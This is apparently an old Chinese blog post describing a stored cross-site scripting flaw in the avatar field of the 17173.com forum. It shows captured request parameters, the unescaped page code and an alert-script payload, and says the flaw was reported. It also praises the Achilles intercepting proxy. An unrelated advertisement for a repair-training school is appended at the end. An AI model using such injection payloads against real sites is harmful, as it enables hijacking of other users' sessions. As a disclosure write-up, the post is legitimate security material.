记录-achilles

WWW.17173.COM作为中国第一的游戏中心， 近正在进行论坛更换，由于没有完全制作完成就公布，遗留了不少漏洞，以下是我对头像系统的研究：
头像系统不允许用户直接更改头像的地址,但是我们可以抓
抓下来的东西如下
代码
face=XXX.GIF&realname=wahahame&sex=1&yyyy=1985&mm=7&dd=1&province=19&city=379&Submit=%C8%B7%A1%A1%B6%A8&Work=saveMdy

测试发现通过更改face可以更改头像,但好象也仅能做到这一步?
我们还能做更多吗?
保存一个发帖页,关于图象显示的JS代码如下

代码
strHTML+="<td width='20%' align='center' height='23' valign=top><a href='/show_userinfo.php?user="+oTip.owner+"' target='_blank'><b>"+oTip.nickname+"</b><br>";
strHTML+="<img src='http://my.17173.com/face/"+oTip.face+"' border=0></a><br><br>";
strHTML+="<table width= border=0 cellspacing=0 cellpadding=0 height=64>";

很显然没做处理.如果我们把头像地址改为:XXX.GIF'><script>alert("无用君向大家问好");</script>会怎么样呢
测试证明,脚本成功运行了.......
上报技术客服
收手,没再进一步破坏了.

achilles是一个代理软件。你可以在本地开一个代理
然后把IE指向他
这个代理与其他代理软件不同的是，你可以在发送请求和受到请求的时候把数据拦截下来
并且可以修改它，然后考虑是否发送它
对于分析一个网站：我到底提交了什么信息；我收到的COOKIE是什么；并且修改他们很是方便
不用请Iris这样的大部头，或者NC这样可操作性不强的东西了。

　　湖南省阳光电子技术学校常年开设：手机维修培训、家电维修培训、电工培训、电脑维修培训、焊工培训--面向全国火爆招生！网址：http://www.hnygpx.com 报名电话：0731-85579057)。安置就业。考试合格颁发全国通用权威证书。采用我校多年来独创的“模块教学法”,理论与实践相结合、原理＋图纸＋机器三位一体的教学模式，半天理论，半天实践，通俗易懂，确保无任何基础者也能全面掌握维修技能、成为同行业中的佼佼者。工作(一期不会，免费学会为止)。